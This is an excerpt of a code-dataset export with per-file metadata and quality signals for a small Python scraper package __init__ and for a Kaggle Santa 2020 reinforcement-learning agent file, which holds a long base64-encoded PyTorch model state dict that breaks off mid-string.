hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3bf418ae8f4ecf38c64c377ce151963a68469373
| 78
|
py
|
Python
|
scrapers/mps_interests/__init__.py
|
spudmind/spud
|
86e44bca4efd3cd6358467e1511048698a45edbc
|
[
"MIT"
] | 2
|
2015-04-11T12:22:41.000Z
|
2016-08-18T11:12:06.000Z
|
scrapers/mps_interests/__init__.py
|
spudmind/spud
|
86e44bca4efd3cd6358467e1511048698a45edbc
|
[
"MIT"
] | 84
|
2015-01-22T14:33:49.000Z
|
2015-04-01T23:15:29.000Z
|
scrapers/mps_interests/__init__.py
|
spudmind/spud
|
86e44bca4efd3cd6358467e1511048698a45edbc
|
[
"MIT"
] | 1
|
2015-04-16T03:10:39.000Z
|
2015-04-16T03:10:39.000Z
|
from fetch_mps_interests import fetch
from scrape_mps_interests import scrape
| 26
| 39
| 0.897436
| 12
| 78
| 5.5
| 0.5
| 0.363636
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.102564
| 78
| 2
| 40
| 39
| 0.942857
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ce1394144f48672bb7970d09584cb37e3539426e
| 419,212
|
py
|
Python
|
rl_agents/a3c_agent_v4-164_deterministic.py
|
IsaiahPressman/Kaggle_Santa_2020
|
ff5c6aa78dbe234cef338f4c721cc30d7dbc3df8
|
[
"MIT"
] | null | null | null |
rl_agents/a3c_agent_v4-164_deterministic.py
|
IsaiahPressman/Kaggle_Santa_2020
|
ff5c6aa78dbe234cef338f4c721cc30d7dbc3df8
|
[
"MIT"
] | null | null | null |
rl_agents/a3c_agent_v4-164_deterministic.py
|
IsaiahPressman/Kaggle_Santa_2020
|
ff5c6aa78dbe234cef338f4c721cc30d7dbc3df8
|
[
"MIT"
] | null | null | null |
serialized_string = b'gAN9cQBYEAAAAG1vZGVsX3N0YXRlX2RpY3RxAWNjb2xsZWN0aW9ucwpPcmRlcmVkRGljdApxAilScQMoWCEAAABiYXNlLmxheWVycy4wLm1lc3NhZ2VfcGFzc2luZ19tYXRxBGN0b3JjaC5fdXRpbHMKX3JlYnVpbGRfdGVuc29yX3YyCnEFKGN0b3JjaC5zdG9yYWdlCl9sb2FkX2Zyb21fYnl0ZXMKcQZCPJ0AAIACigps/JxG+SBqqFAZLoACTekDLoACfXEAKFgQAAAAcHJvdG9jb2xfdmVyc2lvbnEBTekDWA0AAABsaXR0bGVfZW5kaWFucQKIWAoAAAB0eXBlX3NpemVzcQN9cQQoWAUAAABzaG9ydHEFSwJYAwAAAGludHEGSwRYBAAAAGxvbmdxB0sEdXUugAIoWAcAAABzdG9yYWdlcQBjdG9yY2gKRmxvYXRTdG9yYWdlCnEBWA4AAAA5NDQwNTMyNDU2MDk5MnECWAMAAABjcHVxA00QJ050cQRRLoACXXEAWA4AAAA5NDQwNTMyNDU2MDk5MnEBYS4QJwAAAAAAAAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPAAAAAC1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8AAAAALV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTy1fiU8tX4lPLV+JTwAAAAAtX4lPLV+JTy1fiU8tX4lPL